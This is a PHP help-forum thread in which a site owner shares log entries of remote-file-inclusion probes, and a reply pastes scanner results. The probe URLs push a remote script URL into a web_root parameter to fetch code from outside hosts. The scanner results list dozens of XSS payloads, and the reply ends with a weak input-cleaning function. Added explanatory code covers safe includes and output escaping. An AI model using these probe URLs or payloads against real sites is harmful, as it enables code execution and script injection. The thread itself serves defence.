DeanWhitehouse Posted December 11, 2008

Can some people check over my site, as I have just had a few hacking attempts on it: http://djw-webdesign.awardspace.com/

The attempt was at remote file inclusion. From my hit/404 logger:

Page: http://djw-webdesign.awardspace.com//function_core.php?web_root=http://meetpark.com/adpics/r.txt??
Amount of hits: 4

Page: http://djw-webdesign.awardspace.com/code.php?snippet=11//function_core.php?web_root=http://meetpark.
Amount of hits: 4

Page: http://djw-webdesign.awardspace.com//function_core.php?web_root=http://cfmg.paradoxstudio.pl/chat//i
Amount of hits: 2

Page: http://djw-webdesign.awardspace.com/code.php?snippet=11//function_core.php?web_root=http://cfmg.para
Amount of hits: 2
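The logged requests all push a full URL into a `web_root` parameter, which is the classic probe for a PHP include whose path is built from request data. The thread does not show `function_core.php` itself, so the "before" below is a hypothetical reconstruction of that pattern, and the hardened `safe_require()` is an added example written for this thread, not Dean's code. `WEB_ROOT`, `safe_require` and the allow-list contents are all assumptions.

```php
<?php
// Added example, not code from the forum thread. The real function_core.php is
// not shown above, so the "before" is a hypothetical reconstruction of the
// pattern the logged ?web_root= requests were probing for.

// BEFORE (vulnerable pattern): a request parameter decides what gets included.
// With allow_url_include=On, a remote URL in web_root makes PHP fetch and
// execute someone else's code; even with it Off, ../ traversal still applies.
//
//   $web_root = $_GET['web_root'];
//   require $web_root . '/function_core.php';

// AFTER: never derive an include path from request data. Fix the base
// directory at deploy time and resolve every include against it.
define('WEB_ROOT', realpath(__DIR__));

function safe_require($relative)
{
    // Allow-list of files this front controller may load (assumed names).
    static $allowed = array('function_core.php', 'code.php');

    if (!in_array($relative, $allowed, true)) {
        http_response_code(400);
        exit('Unknown module');
    }

    $path = realpath(WEB_ROOT . DIRECTORY_SEPARATOR . $relative);

    // realpath() returns false for missing files and collapses ../, so this
    // prefix check also rejects any attempt to escape WEB_ROOT.
    if ($path === false || strpos($path, WEB_ROOT . DIRECTORY_SEPARATOR) !== 0) {
        http_response_code(400);
        exit('Unknown module');
    }

    require $path;
}

// Defence in depth: refuse and log any request that still carries the old
// parameter, so probes like the ones in the 404 logger stand out.
if (isset($_GET['web_root'])) {
    error_log('RFI probe blocked: ' . $_SERVER['REQUEST_URI']);
    http_response_code(400);
    exit;
}

safe_require('function_core.php');
```

Alongside the code change, keep `allow_url_include = Off` in php.ini (the default since PHP 5.2) and, if nothing on the site needs it, `allow_url_fopen = Off` as well; those settings stop the remote-URL variant even if another include slips through.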
darkfreaks Posted December 11, 2008

SQL Injection:

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

DOM was modified by attack string. Field appears to be very vulnerable to XSS String.
Tested value: <a href="about:<script>document.vulnerable=true;</script>">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: [\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <xml src="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <img src="blah>" onmouseover="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <img src="blah"onmouseover="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <!-- -- --><script>document.vulnerable=true;</script><!-- -- -->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <![CDATA[<!--]]<script>document.vulnerable=true;//--></script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<script>document.vulnerable=true;</script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <style><!--</style><script>document.vulnerable=true;//--></script>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <object classid="clsid:..." codebase="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <style type="text/javascript">document.vulnerable=true;</style>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <div style="width: expression(document.vulnerable=true;);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <div style="binding: url([link to code]);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <div style="behaviour: url([link to code]);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <div style="background-image: url(javascript:document.vulnerable=true;);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <body onload="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <a href="about:<script>document.vulnerable=true;</script>">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <img src="livescript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <img src="mocha:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <link rel="stylesheet" href="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <bgsound src="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <input type="image" dynsrc="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <img dynsrc="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <img src="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <div onmouseover="document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></OBJECT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BASE HREF="javascript:document.vulnerable=true;//">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <STYLE type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</STYLE>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <STYLE>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></A>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <STYLE TYPE="text/javascript">document.vulnerable=true;</STYLE>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <XSS STYLE="xss:expression(document.vulnerable=true)">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <STYLE>@im\port'\ja\vasc\ript:document.vulnerable=true';</STYLE>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <DIV STYLE="width: expression(document.vulnerable=true);">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <TABLE><TD BACKGROUND="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <TABLE BACKGROUND="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <DIV STYLE="background-image: url(javascript:document.vulnerable=true;)">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></FRAMESET>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IFRAME SRC="javascript:document.vulnerable=true;"></IFRAME>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <STYLE>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <LINK REL="stylesheet" HREF="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BGSOUND SRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG LOWSRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG DYNSRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY ONLOAD=document.vulnerable=true;>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <BODY BACKGROUND="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <INPUT TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: </TITLE><SCRIPT>document.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: \";document.vulnerable=true;;//

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT>a=/XSS/\ndocument.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <iframe src="javascript:document.vulnerable=true; <

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="javascript:document.vulnerable=true;"

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT <B>document.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <<SCRIPT>document.vulnerable=true;//<</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="javascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <IMG SRC="jav ascript:document.vulnerable=true;">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <SCRIPT>document.vulnerable=true;</SCRIPT>

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">

The unencoded attack string was found in the html of the document. Other browsers may be vulnerable to this XSS string.
Tested value: <meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">

<?php
// Loops over all $_POST variables and cleans them automatically.
// array_walk_recursive() ignores the callback's return value, so the
// parameter is taken by reference; otherwise $_POST is never changed.
function clean(&$var)
{
    // Undo magic_quotes_gpc first so the value is not escaped twice.
    if (get_magic_quotes_gpc()) {
        $var = stripslashes($var);
    }
    // Clean XSS/SQL injection. mysql_real_escape_string() needs an open
    // MySQL connection, so run this after connecting.
    $var = strip_tags(trim(mysql_real_escape_string($var))); // changed $text to $var, my bad
    $var = htmlspecialchars($var, ENT_QUOTES);
}

array_walk_recursive($_POST, 'clean');
?>
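The scanner's verdict for every hit above is the same: the raw attack string came back in the page HTML unencoded. The example below is added here and is not part of darkfreaks' post; it replays that check against two ways of echoing a request value, using four payloads copied from the results above as constructed input. `render_unsafe`, `render_safe` and `reflected_unencoded` are my names.

```php
<?php
// Added example, not code from the forum thread. It reproduces the scanner's
// test ("unencoded attack string found in the html") against an unescaped and
// an escaped render of the same value.

// Constructed input: four payloads copied from the scanner results above.
$payloads = array(
    '<script>document.vulnerable=true;</script>',
    '<img src="blah"onmouseover="document.vulnerable=true;">',
    '<div style="width: expression(document.vulnerable=true;);">',
    '\";document.vulnerable=true;;//',
);

// Unsafe: request data echoed straight into the page.
function render_unsafe($snippet)
{
    return '<div class="snippet">' . $snippet . '</div>';
}

// Safe for an HTML text context: escape at output time, for the context the
// value lands in. ENT_QUOTES covers both quote characters so the value is
// also safe inside a quoted attribute; URL and JavaScript contexts need their
// own encoding and are not handled by htmlspecialchars() alone.
function render_safe($snippet)
{
    return '<div class="snippet">'
         . htmlspecialchars($snippet, ENT_QUOTES, 'UTF-8')
         . '</div>';
}

// The scanner's check: is the raw attack string present in the HTML?
function reflected_unencoded($html, $payload)
{
    return strpos($html, $payload) !== false;
}

foreach ($payloads as $p) {
    printf("%-60s unsafe:%-5s safe:%s\n",
        substr($p, 0, 60),
        reflected_unencoded(render_unsafe($p), $p) ? 'VULN' : 'ok',
        reflected_unencoded(render_safe($p), $p) ? 'VULN' : 'ok');
}
```

Every payload reports `VULN` through `render_unsafe()` and `ok` through `render_safe()`. That is the difference between this approach and the `clean()` function posted above: escaping at output, per context, neutralises the string wherever it ends up, whereas escaping everything in `$_POST` on the way in both mangles stored data (SQL escaping and HTML entities baked into the value) and still misses values that reach the page from somewhere other than `$_POST`, such as `$_GET['snippet']` in the URLs from the first post.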